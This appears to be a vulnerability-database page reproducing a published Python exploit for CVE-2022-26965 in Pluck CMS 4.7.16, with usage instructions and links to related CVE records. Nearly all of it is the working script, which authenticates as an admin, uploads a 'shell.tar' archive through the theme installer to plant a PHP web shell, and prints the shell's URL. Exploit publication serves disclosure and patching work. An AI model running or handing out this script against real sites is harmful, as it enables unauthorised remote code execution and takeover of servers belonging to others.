Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAshish KoliPACKETSTORM:166336
HistoryMar 16, 2022 - 12:00 a.m.

Pluck CMS 4.7.16 Shell Upload

2022-03-1600:00:00
Ashish Koli
packetstormsecurity.com
265

0.029 Low

EPSS

Percentile

90.8%

JSON
`# Exploit Title: Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated)  
# Date: 13.03.2022  
# Exploit Author: Ashish Koli (Shikari)  
# Vendor Homepage: https://github.com/pluck-cms/pluck  
# Version: 4.7.16  
# Tested on Ubuntu 20.04.3 LTS  
# CVE: CVE-2022-26965  
# Usage : python3 exploit.py <IP> <Port> <Password> <Pluckcmspath>  
# Example: python3 exploit.py 127.0.0.1 80 admin /pluck  
# Reference: https://github.com/shikari00007/Pluck-CMS-Pluck-4.7.16-Theme-Upload-Remote-Code-Execution-Authenticated--POC  
  
'''  
Description:  
A theme upload functinality in Pluck CMS before 4.7.16 allows an admin  
privileged user to gain access in the host through the "themes files",  
which may result in remote code execution.  
'''  
  
  
'''  
Import required modules:  
'''  
import sys  
import requests  
import json  
import time  
import urllib.parse  
import struct  
  
'''  
User Input:  
'''  
target_ip = sys.argv[1]  
target_port = sys.argv[2]  
password = sys.argv[3]  
pluckcmspath = sys.argv[4]  
  
  
'''  
Get cookie  
'''  
session = requests.Session()  
link = 'http://' + target_ip + ':' + target_port + pluckcmspath  
response = session.get(link)  
cookies_session = session.cookies.get_dict()  
cookie = json.dumps(cookies_session)  
cookie = cookie.replace('"}','')  
cookie = cookie.replace('{"', '')  
cookie = cookie.replace('"', '')  
cookie = cookie.replace(" ", '')  
cookie = cookie.replace(":", '=')  
  
  
'''  
Authentication:  
'''  
# Compute Content-Length:  
base_content_len = 27  
password_encoded = urllib.parse.quote(password, safe='')  
password_encoded_len = len(password_encoded.encode('utf-8'))  
content_len = base_content_len + password_encoded_len  
  
# Construct Header:  
header = {  
'Host': target_ip,  
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',  
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',  
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',  
'Accept-Encoding': 'gzip, deflate',  
'Content-Type': 'application/x-www-form-urlencoded',  
'Content-Length': str(content_len),  
'Origin': 'http://' + target_ip,  
'Connection': 'close',  
'Referer': 'http://' + target_ip + pluckcmspath + '/login.php',  
'Cookie': cookie,  
'Upgrade-Insecure-Requests': '1'  
}  
  
# Construct Data:  
body = {  
'cont1': password,  
'bogus': '',  
'submit': 'Log in',  
}  
  
# Authenticating:  
link_auth = 'http://' + target_ip + ':' + target_port + pluckcmspath + '/login.php'  
auth = requests.post(link_auth, headers=header, data=body)  
print('')  
if 'error' in auth.text:  
print('Password incorrect, please try again:')  
exit()  
else:  
print('Authentification was succesfull, uploading webshell')  
print('')  
  
  
'''  
Upload Webshell:  
'''  
# Construct Header:  
header1 = {  
'Host': target_ip,  
'Cache-Control': 'max-age=0',  
'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="90"',  
'sec-ch-ua-mobile': '?0',  
'Origin': 'http://' + target_ip,  
'Upgrade-Insecure-Requests': '1',  
'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L',  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36',  
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',  
'Sec-Fetch-Site': 'same-origin',  
'Sec-Fetch-Mode': 'navigate',  
'Sec-Fetch-User': '?1',  
'Sec-Fetch-Dest': 'document',  
'Referer': 'http://' + target_ip + ':' + target_port + pluckcmspath + '/admin.php?action=themeinstall',  
'Accept-Encoding': 'gzip, deflate',  
'Accept-Language': 'en-US,en;q=0.9',  
'Cookie': cookie,  
'Connection': 'close',  
  
}  
  
  
# loading Webshell payload:   
path = 'shell.tar'  
fp = open(path,'rb')  
data= fp.read()  
  
  
# Uploading Webshell:  
link_upload = 'http://' + target_ip + ':' + target_port + pluckcmspath + '/admin.php?action=themeinstall'  
upload = requests.post(link_upload, headers=header1, data=data)  
  
  
'''  
Finish:  
'''  
print('Uploaded Webshell to: http://' + target_ip + ':' + target_port + pluckcmspath + '/data/themes/shell/shell.php')  
print('')  
  
`

Related

prion 1
zdt 1
nvd 1
osv 1
cvelist 1
cve 1
exploitdb 1
prion
prion
Remote code execution
2022-03-18 07:15:00
zdt
zdt
Pluck CMS 4.7.16 - Remote Code Execution (Authenticated) Exploit
2022-03-16 00:00:00
nvd
nvd
CVE-2022-26965
2022-03-18 07:15:06
osv
osv
CVE-2022-26965
2022-03-18 07:15:00
cvelist
cvelist
CVE-2022-26965
2022-03-18 06:33:34
cve
cve
CVE-2022-26965
2022-03-18 07:15:06
exploitdb
exploitdb
Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated)
2022-03-16 00:00:00

0.029 Low

EPSS

Percentile

90.8%

JSON
Related for PACKETSTORM:166336
prion1zdt1nvd1osv1cvelist1cve1exploitdb1